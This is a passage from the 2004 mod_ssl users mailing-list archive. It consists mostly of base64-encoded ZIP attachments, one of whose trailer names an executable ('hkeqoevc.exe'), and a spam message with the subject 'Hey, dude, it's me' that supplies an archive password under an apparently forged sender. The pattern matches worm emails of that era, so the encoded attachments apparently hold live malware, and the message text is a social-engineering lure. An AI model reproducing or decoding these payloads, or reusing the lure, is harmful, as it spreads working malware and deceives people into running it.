4D5o+mjYFvEZOXYUgfiRmYJSfLk771UBU1AfUTdTqzEtmRsxDpDnFLkdulCKyGPVsHdmHAuH
3R7ztaBTYYDK8dm9zJjdU40rJojG8iW5omtNrDZpcpaOYzUZCSZNUEWlvO+hPOKJt4GwqArj
RfscZD5VOCJtzKO5VRKX4R5iHSOZT1LMoIPqpsIk1OGdFttjdOO0GP97C707EY/sX/UQVd2b
s3qD25w6fCcKkyhs/V8CA7mHQjPH9IAN6q8AV8iW4ICvVAb3l+u6WYAEEfvr7S4tzbQl5PBs
PArk7ezO1EoDGAPl4gUtBh4zyn65oED24iWDL5w0Krz0/wl2rtsE6w8YW7ISSyksSImB7jbf
G0yDfWl4zdBd7b8Eu5EBoYek0M5fCnUsyk6ZMnlcEN8V5uiXTKdJWXizO8HVB87V0ofxjjdQ
H+/ScGGgiMXYwTiCA8O+5qI+ayhTsdr6p0Vie8z5RU46G5bgIERX10lpi06R9j0w8rI+rRdB
Z2s5StDsnYpnJ0IqrDXmkOt9sMUD7TFy2aKji21z+0jDyRJNOAhvU53DIdTAYigyiW/xwZyj
vEsNf/5kr3KfyGmcp0+4kzAnjm5nPOaxp41GyCM0wP3EWOfs3RntQt3g9EVOr0B2gK0ZcSAQ
RIMYT2NDsJc7axKYB1Ujn6SFzcedpb19XoidQAVN4psEHiS+DsWgfHg24j3FPZ0SSprpH7mi
42SGmTCcQfkLOKh2JiG60z3A1azREF/r0L/FtLTjz7jrJ/UQ4xGVanrMFPlB8XCpWnbts+Z8
BFkXe37fzYOMGbAKXJMouGbfER36W0czTrS7h/yw6dgcO6vYKW1/33JY5gY1dSKMeFlzzhm3
ASzNwKTrU8YrV0BfeqtIopOxY/TFxTNPISXpKqbixEU2Q1+Hx8LPDBXtu8pDTP3ZnJPjn/KP
HCnEcPdLlxj92qmJo8Zptq/K8aswLhz0P+01uTM4SnbRIjRbdrZ2W7MtRK72XNHuVbr9YfQk
FCwFHBspVc3N8Yp04FCAW/3jAoq+Y7p+GdvmlCHXHozZv0060TLrPhkhAY2nmJ4Bqqdi/8pb
IVsWS33QWGwvLq7UMHeiPMZElD67CPaer/X1BYGOgktPqXfQV8efiXiXIeBXsFwpisGzzjw6
vwSA4Yov5LlmlKMSIhRAzOgq+DSR+KCf/Uiqs2mS7ewO9MyNZFitI3FgkRoU/84kp351AgIA
J5rYLpjr7UF36dphIG3IFfu4mGtOMDoTTsNlUblGRZluqqwGeenu4RRZzZcbpNNIL4ux+hxI
HsgdY+TE24krTxf7lp+uLXqXR7jevv+aIHx6YsNKPtSV5k7IbKoQ6sH2ZzWA+wWYIM/tKz61
5SbrFd2gB5eOtGXvd7JP+HSK0ya5SQOTHrB0BJQuyZWn4V6TCUbfqVe7DPJp3A3SaKrcFkV/
RxAOs/UrGBBcjTe9N9No0WRpcWC5BwXu7MhTmnZlpefTLKCdr0WC1ROGUmR8PxXgkuSa414Y
mu+NnKp7A+Kv26ES5Xsi5Bbl7NGFKXXujVg0uQoSTURfwkhgn1M+SkOv95xzdbQAGhGYOO2I
NknZbAEbHksEbAKyGGjyghidNrAQ6dZ5v4U+CEv+I0UCMyo85X88GSHNP9B/aABFhwj8MDnE
TGvxwk4zJRH4jF9ezlIPTSTNpIZLkD5XNxlu/q8zgVjDQn1K3FIrr7SEkd/lHCq3nnz5yaTH
iUy2Bf8uqcQ4SWP5CeYNmXxCJmqseTHDYcOgxlns3nJx/t2Zo6mRI+qU1+Z8K60flGhknwIZ
Wv9l+Elu7MktzJSLmwceDg785LrRzW4IMNH5yRikrEYuyQUz8edks0ifl03pt+IgY4ssG5EQ
Gkgyf1WpRf58zbsIRRBZGFKgMUAPcC77+371onlLsCejns5Wa5KeNasmzwivfAcQsTdXjgS6
Zynzojtkj23kvjYk6D5xG3L8P9Tqq8H8YA1nOOBs8JKr6gj3W0ZFVJ1+vcRqvRo8IINK/CMe
hFXJc5QHATmCoXIg5lzqpwqlh3O3086K2Ud/VPlBE4N3lKVeGS0zVhLAWXnxdIV1WyYGSlUZ
sDu8MDGbKHRiVPWZYebbj/ipDaDk/+QWbbPelp7gd44fav7ioW+/FL4LMxFpXFCYsgCWARHj
IZ5eZsEk3j2XbhNDD5gkHvNfuGITcF/OU7ktHSrYFi57SiD6nWEc6mQ9dFS/+LXWqG6pnepr
Soc71HIFQ/SFVEb++EewvrQ1KDkdzOtqVxFAOadsaRcTXLrnxfxlYQbCfCY9/IUyaQrScQwj
HEVmMPuf94BzfKTuj1P9zmnAnPgnBmFr0t4lp+XftYItu/GAtZkll1fmNUkuE9eULbD8hATx
GTIKXsxVgv/boMqzRh7reSvEZviHpoYNCF53UWvGw7dCbRoNkFLutnjfep5cUnccmhDuy0l6
xKBQXJ3DWm1ba/LfmBI/HoFwrRKpQ1b09nWFo4PYBQ2u8JWp+SHcMrH7DLIg/EDLxlMVsHYB
O37EB1wmRPQky3onmcfzUXWs/edAFucSyvACJ7DDNB07Wbeqk5XPE2ElRZfYOI6H5RPqooIJ
5rDScGY6hdJ6G+impRpgteGNINjw0W3rl7GT4WfKkOkEKIjT6LJS0ktq8odphIRRmp1QrTV5
Jdn0AHACdx4+6Yt86MUOm14UiPvQUCbKJu/V4PYqX3oi5vxtZetI9lB0V9ntvZ45FU5yqzhH
KcCeQn10w0iKl4WEU+D/DGTZy0Ww9aCjS1koo4/iImrDKROtXi29Pf3zGAUFOLa/VwiZICTp
hckzjkS6ZA/uZhLzunJBw4YskQTBujkZBbBhIrfDim+4iBwilPBsNutcEhNMJaLEMLPCEex+
r2Kgkt+1V4u+PWUo8s/KT04rZMrnaIVefDFX0TyC/aj/Kufk+hby/90ovooCFUnszp0Zx76P
hqX60OLNxfdp0IerOqoDUxuVqEsm22657NHtMCb8zNtaYPrTF5xlX/kZdXe/HsdSEkDwwmTG
w3XQtlPUzghL/TsEAR6EwdFUieNsjED8x/LF8329HTR4lDcmBbCdRkTxbYkKp4dGgwNBwC1p
/NojgJTVXb9cMW16HRXjKowt8QcwcVAWfg5lANYej8y/0om6xPwEQOcr6QpAfMlKgWMPzobc
QdGJ6jC4NVUk3xFafWt0QLZXsHwoINuQwCfy4T1lZqUt3gZqCZQV5iWhAaV93/iescWqC9Rp
yJHjWTUs7Jzq/rpB8VqK5NEEdAi7pJLUEGG+A2y6KkS0Ez4RHODbdYQpybZv/HGVJxC82aIF
oNWflzw1OkD+HiTK0DghvVo5QUGc2XmCyFVXiMHTsNCfMSqSZCZHlJKpl0eZaxmCHnIzP/g7
SwH0fz2xhEW5ZIQxqGvrqQL56K+FPjbiqx0D1k1lOAs87zODf2Bar6a7OjJ1MCnZPDjZEV+m
cmJp9Std10nRGFvQBMHuY9sU3ciDtIERHg4pcYTFFyM/BByBqqJtPtOOC1XjCADShE65KpOX
40WxnrNgjmL0TFhOZX6dG92eN573mZhlNmFheXfCd2DhTZ3G+oUDs5PAMEbd7U9D+qx+majb
8bM4q4zEMcv9qIdVimqBA6T2gtLf6dx+pvEVKg/OpeuwXXc6pjSjIVkHxEK9zBeVICFHK/BC
EQxWrzGh4Xcg8sZfoNx1mPqotqQn/mY+SL8UWuiyqIxAaUpch0hTFR/VlB/DiMBQIevyrKLS
Rsnig/mm7sFtbO16td4uKo4T7vwJABtUMxLVLZIYkAwKtiLzIukFdjyqms0AjkPelQPuM1u1
2zyBiPNyWff6+G0qmqJY8Lwe+lZ7AxQuTtImtnaGHy9B3jwgjLdMf6v1AMEX9MaCiJuy3nrC
C2iGzKJw+mogMkJtSPi9slt/tQBBY6g3v3oMaJcrlCNRUvLd49h6u0DyWCG0p/CGgjNC74Fg
4B4A+xf1GsfAveD7R3MmR9xLpUDX7zShYxIPBq0o/OhLWc2agkiGbiYLL3MXPf1nUkP6hfxV
RZEyKa8D5j6e1uZj5tbspAIdg9J3C3ABVxCOXphPwjCxTkD6xY5rW71nQjHlpsHHUB3mx1HZ
tYc4LJg0nRScUOV7OwB/6QxP0ga+oVjHKDlLd5rY90ThpKU62/A4CqZHkJZZerotdtqlz2xq
OBGzz6ij86c5dmAHlTng+Nc0K+93xnhKwDFbrPmFDUPtM1uJlZ+mWccgNq12LIhf1wYjzkVZ
CrIcMkqzxLsARAQyJN+lO9Um7dTn2H4AZryvY45YxiWc+WQDh6aV1eRhC2VdOJ2BnLf7Ckh1
LW+JM41h76Vi8lx2Xtc9dWAQB625fQhP+b0eFYJybbVwCYtiDabqCLnDibSwFfW/pZ8E9qKw
Dgx7pVzYkyOu7F8Sg0dumBDCLQUMO9AE6aD9YMgOeSbKKFzlLiejC4KPoAIZPYBqWE4lwGSm
E4rQNuZwXrAhNWNlXEtSURH5HuOdF+ZV85gCWl1bVJPrTPf5OGTPkBFUEycWMyQUSc/M6Nyo
RhF4hV2bE/Z1ZnFGkR97jQWTZJXCrlr6ZiDa3B+8h/qTfFAmCkRgeeZZtbDvuA8xFIQVEWcI
DC5YsGFknzWSFfw96Ru9AJoVmjSvsp/U8WVa4TMrS6L25LkF0MxJGYLbAj5vfCRcLRrrApCY
xBbAUqkbQ/fEXrurzalF1TJofI7AdiZXEDQQ2DHkHKo0OGRFXsGzUADocSobQlu+J7L+guX6
q31NPPQ2CfHnaN/+qq2MMiZo6nS/G2WM4CVUhby/MLMsp8M5CiuE3YTOW1YaTVnQLS1cDe3R
pjVxGg//DFrWzQ8vRiwX1DfjzoV5ScnPRWRJgankSB1f2DHHEEab99j2uPFOngwzXYV9MtZL
Sr50b+wxJXi7BBHYPhgEcAhu5dFfVpRWP2u2g4IHlMBUVu1DmFkQ2sxQmuxtQc0dppREDcSc
ZWfa2p7K/dKgUBaeNjO8xaQXRf2xSCXCl1QdhVDGCnxwJxOq259YqG/WS33bk59jL2D6YLm3
WPjiLG+ByZRG9yWz6ehFw24+kYjPQSr/Wz0vp6fPrJbGzOQ0GBL2k7S8R/lTp3knw3gBjApw
HhHDYLSCZ+JBlFBy3Ms3wKXgCUsU5k8PGfLP0T8jwyuMSXrCL/NA5gG0+qK8Y3HWglh5SiYz
I0EQyPlc+t4jayMh4jiERZr/WxeKKVoWW9kJAfjMcVzCpguA/3tJe7vyvgEEi9nOB+BMIiLU
4Z7qM7fV5DBA6Nlz5VIQ8aeB21SxxYqFHAIUZ6xQomkow1UH8qCu28SkCB9yEBuToGQE1T6v
ba2+AftsyDbipoz/30CbWP+0wxbiBO+8afKqwG/866aaS1g33EBcwv9Cjd3mNAzoNxWVGwHU
BVST7FGe20L9owf8enI3/BXuQEeGdGUwdIvn5Tr0xt7Ww388x5GPzjK7Q0lEbI8pn2DRI+V9
kPOBcc5aFBpvLW2ew5sRbh9isyX1FPIho/waJ6piHTZTfsfWSRPUuUz+Lg4gyPnI+FGMJ9zy
k6OCLdXKdSyx7G2vO3qcNlRKA6SlnZbOZo1HAzO/ZYC2ynfHFVexaayVKADw51ekIGi7t9yU
BfX0IRfnawbavtvNCPwKezGaBy51ScajU0lxw6BnXfz3BE2gn8McQmgDSApI42JR6RscY4d5
hH0XFghCepF8T0rn6KLeYucLT9r/0KrWMIY4/aHqOxh8RI/1NRRgfTLdimLQ68Rbb8OwAwaM
t+dP2C61RIHjiA618Dl97cBkIw385GqbVC+NKDJUVlCZUKLm2/r7Dfy8eKEm/MvwLe0DVI6J
WBm7NinUkc9nwAgFjCXJmm46PxPqtfUkz1d9Pcxt38mi7HZ48VRBLWaghUiIIiZSZXGxJEnj
YgKTxX/wB0nC09hg6Cuh0a6L5k7zd7s5/lw1vT9XlGlys4ld9R8dDySfxajTVAXc76rPMZD9
e6HojGGsKvB4HmiPhSjd7433gHvtLyOC1hl7ZZ3ndLGb0SZsAgtTqo3KbtBfpFPa1UJGs1oe
X3w4bGj4dsL5DmcZ6ji8czr+bC7HNcAwHlBtyc4E/w3Ge/QWek22/wF4PvPu3lpgndw0rUW9
KMDtLa7OSOJH3buKFLrUoX5UqMGXnWhkRs9RBHEfaYdzXYkQwFasojdc9EnNtth/H/Rnpi+u
TUdX048negqWjo+uRXC/NzeTQUmMlxLOSZ06xytrO+3fAO6U28xojV/UZm6w6TLHMk4ASgzI
3anRVigzPiOEv8CqpWAiCrn1qZ6z9IECv3YhV17vm+TsKznjpuuPsZS9+0cjBgKp+15oY3IE
j4Lonk09eFFImrfLkua6VKJx9ztRzsU8ZaN1P6JIAT/bWhYFJzjDia+F/TK9l1IyK+foGtek
UyfrVo+VFepVKOPaksGzXeu1jloP6FYONw801pDxgnpDs0z1IArmJo7qs2ovxePPVWGB0wFk
gJ25+idhJGVpVXl1bopwMrAT1dZDWDQS8O4r2ASuSqe8yPAl1HnCbx5wvx+Os8PtFTb3to4D
BzHJa9c31x5KgrugmWPWkzDgMjGOCTI72wm5o4NgKfFJIDG4S8WXQzPgTdPs9nW5PhUbNXpV
CwBiN77hOBciJjeIGrTfBBk1UBPMo9lnfekFvspRmEw4RLlhX87YwU2u1rv7Ls8cGFcTniuY
3B/lcr47mc1fxrwX2i1I2Dzy2lwf2xzzDKjK/BO6sTwEFkCDG2b1F2tDewozHbgZLO5+y4cc
SIB11ITRLj9ZKSgRu83fZMufHRXIWaTCA66itowWb0F+0bVxsnW2NrRV2a1IxDQxXrYCpBGF
10WhmpQh1o2w/IWU9SPpLB6IAtMgfHJPx4B8HPVqewOhA1pR3GHdGAw/pkgLEtSApRF+E/TM
F3BzS5WYLUTC4Xo6Y1w4ToI+H6/QWFMbcRRM92MAuZUOFBLclLnJ5P8DN7Rnzmr0p8Du09yE
y6q1EUF7K0P0aL2Ooy4MSkjZDCbPnJ5ek3RqfUGqlW80qTaNvPcRjrYvmTZxBudJryBfGnqg
b0mmAD3/Jio62/UPBvJGk+6BxWBAYHfBghH0mIGU0ElN+WpJ+USMyaoZYznVYiuqCRXSKWLU
e4G0SnKFSeGglnpoa9RN8YxY2A/NOoAol+5n8asEPVpiFxPeKn5r1kKs/2DmwMgzZT0R/Gjj
gvP78+MVHn/HFhvPY9J7inEz1Iwfvf8Y5cqGPmZ7cRvlJHJTY9qlCEqCXjCP6gmdLrQHohkz
GgxgEImZ2J1T9YUAVk6Qw1KCfu08SUjGJwigcT84054/9KABUgTWvooR/HxHZswpXGWIxhcU
CPqjdu5zmMmRtVP1hlf09+jcZPrfKEAco7yEWHmKEjKBKmxjjJMV0VkP+H8OGeYzZDMf6S7n
S5U52186Q52VrK7wpvirTFTMe2YZAX+UNt2XRPVoZyUR52H2e6HGmtjmZnzeGEfTc/zI5+Io
jXQb4E+KHlegbcmF42z/aJuffzMGrsYCDKCGNdtHSUr4gXMa/dwD6ecIMkH2EuSY8dOonqVu
PfUY0aZHFEVL+0yw9OzYltLYmXJO6EYCV+HNPifU2F0A7diV2kcFqTspJFNYdiTBKMlX1+xM
L5PQ0yIzJ1P4nmYYAnOK48rRbxNrmvX3QWM822Dovl/NiWFjpvTq12EZ9ZNSsNW422/a3l89
0EYr+jgdC+m9ks/GYt4Pe+SbE23lHfrF6FQNbMeIaISrO7nCbUnJRF/3Nzp0+M2UxbrgKmum
0U6PTzAEAy6FWQb4Fs4hYy8HCc1JwVAwSskibJMOKUfjxq7zw/h7T7ZAnzZslHI8vZejThMr
9qxj6OocVfKTajYr/ZYFlz5nl5ATGtzqCFvXd4pLoraij+dgzSGFJx6vmXsyRNYb9cboO6sT
MMuPK64WYTXKPGFHR7oVdcqAVaDQOXP5ZqV0U7WWY8tgw2ytCWGiULBkQejEZ6i/MgsJ6vGg
YgO0rGjAURIn8eX/0k9bbW1oeQNcKpTU7Dn9ZezmD7sG7w363vvViuXZ9rIQwJBTC+jI3mde
lSIRyOtJGnQf2j9DLSyctsIedlIFP8av3N42USgBwQ7F5+bb3U7pzXfauqt1YxDkWTxO0f9+
gPTuSJRmuCymzbJKun7sP5zqiz3K+LR5nZYQXX/lji/fdXFqv+lenpQSweW/skPz5NbGMZnS
XmHS1QaYQ2FZ+Ju2TYs0eqpjylAvrM/7p62nkCcr9aSj55Jy9E40WWUWjBvyVq+dLHNiAOZ3
qkero1w9xBflW7k/+uzq5DBBXflgksiRxAV0HnurTHu+0u3WYI98Fotku8sV25vxT0QV3v+s
w0CAjtUGKY7TILtt7mZYCx73xSQJWD1D8r+qDkh0pXR9mMvrYL98lOFi9BWZQFkVg7+wQ8RM
tmQcGMeGWZetfgwIlUtgJJ25gCxwqPoiflHqFeEny0086g28pq61x1XWeZBk7IVmZ0+/dubq
XBZRZqs8fN1KHVlXSC2uWKguSuSmkEVxi45pIjU7R+Tv/n/jSfgr60fs9Q13mKpO9T+ZFarM
lFLa6OHgjYuxpQWfBLfU+fChg2P+PD1/aFzPsPgImFSjjJU4stcN2Dzh7fgUs0r9gO/kF9Hz
+PVBylsoAQMKM1ljjqsMwJPjsi6a1yJPBUc7zWtQq5bhgUIQHv2Tg/9WXZf9RONskd0QRpVJ
AXoFvckuWwloipw8wwX6wjTLOxDBkLiGLmgwnDt6DHuMlw4CFy6z1r4vLONc//Lk1EEH6nRW
hqRDxqI3Xn4BBZhoxQ7fxColYxmmATJpy8iOl+K4Dmy2onhRu3jafAZgvF1/kET5ZdiWdb7J
U/iIjNdmJ6krNyArVAmpsYIBvV+zfltapjJa1ZNXYIqNj4MSptUH16iqrR+zPizboyXUqz1U
CFs2b1W+v3BYtyf+B4236z4ItF0cvwDTB6JrJl2OEoTfmfP5v6BOUsqFsDOBH4afMRPoxvMQ
tk9bzsK/NSXseWb1hnDmrkHlitemAi/x4rWg4C/hnlq0/8HsLNMvsZqX76Cygfb4OMcnRsAF
M2AV8RYw8lnZm0DUCrgP5QwcKpb0bnVpNiZMb/DBCIFTtGdXSA8YXCwaGdlsf4EorEZEP3NT
4v0mWPaqHcTcpDMNKdipnfjdizzFVTIwuUF+lhTHfZFuGjyxHB9AitmKiOXVJo1FJyRxdEOq
m3Ri+Dkuij6zY2EjnD4tMm2cnBztYJQ6gSoKdQz5v28gOCDRAXixCIYJ0Q6Gs/E4Pq+kbt2a
GE/hvEQItGU+5pBEtY5PIDNV1SkPhPc21s8w29cTakimPTcOfgvpKILEMsAHB5nMHF72DFaQ
i5YN+Zlao4bIy/lEF5xPLaVcBOz912Y56hJYPo9XeTL6IN9SARKr3Nxyn8fuDm+Y/cPxU4aS
qasHEWUoJ3Qvxy7ToMhCLuJMsKqaHPWDPHdmKH9cMmLTm1ZvX99A1wUVu68jP6aayLQZOPBf
hZJTVkbLDQHwF9qOouG7JYle0sKhyteAVhTIV4Jdi1aH1OOrxIH/Dx7o/3vOh+s00gi43l34
+AZ1IpNvwO+2XGRiR6VPLPYjXfPAmqa/2aYWE/n5TT+BAggQ6UMGuUmOs2kMYR86LbyLpjxI
TwFRkA0HX3eb7SJGOSwVLiL1n7CMbN9U6pzGZDOlnCf0umj4QpVte0DqV6abwTcX6PC+fekQ
+rAdLf6qro4q7I5oCzIPryAQkUN6ysrLO6Ladc1P/GlwPaD+FlFOfM6mkCa533EktEors/8O
H2R70YvMHyMGU8M2BhabtSNnJd+1FC5pyphy36Yzu7zjBNVMV1b11tPtrv47zDhtKK6Un3e7
KwI1epdAnJGCmWsN8rhew0F24WmvHlHM6ltZ0XHVbWsN7HNaRQLOVVpQQGAcLRXNqtFM27mW
wM/gojbkWdjhjDyq7/21hPZGk1p5vmccPyX7aa4jzU6qBuTd88ZPLTVmor+1pg71S4D8P9Um
4+0jn/5LqnQcQxLXqKJSFjD0rQ5CjSGSywSqrt7uqOiB10zYMeiGUV5IF/VlEytMMXkBDYA+
BTn0c0DLO4jftqAVkGOC4WLAsfeKLlFm6cfYCtx6cMUkoHXjIMpQodY7BYZtv9WY56Hne7cJ
7/nxVLowgHxM1wD1/NJELqrje04qEayFtQ/zqXBJtb3cdHNOQHPRqdEWAquglCjLqpigT1wS
nqOGErJd4NsIbn2wxq9MMSNgrFhMGK/f5s34IHChx+k/OSher/FbpHmIUEsBAhQACgABAAAA
wHJjMEANMBpgVAAAVFQAAAwAAAAAAAAAAQAgAAAAAAAAAGhrZXFvZXZjLmV4ZVBLBQYAAAAA
AQABADoAAACKVAAAAAA=

----------neeuqybrjbailihuvcki--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 07:47:06 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2DC45A8A89; Thu,  4 Mar 2004 07:47:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from chan (adsl109.dyn250.pacific.net.sg [210.24.250.109])
	by master.modssl.org (Postfix) with SMTP id 9D391A8A61
	for ; Thu,  4 Mar 2004 07:47:00 +0100 (CET)
Date: Thu, 04 Mar 2004 14:46:54 +0800
To: modssl-users@modssl.org
Subject: Hey, dude, it's me ^_^ :P
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------scxcukwfifopjgsdcctt"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------scxcukwfifopjgsdcctt
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Argh, i  don't like the plaintext :)

password for archive: 53175

----------scxcukwfifopjgsdcctt
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
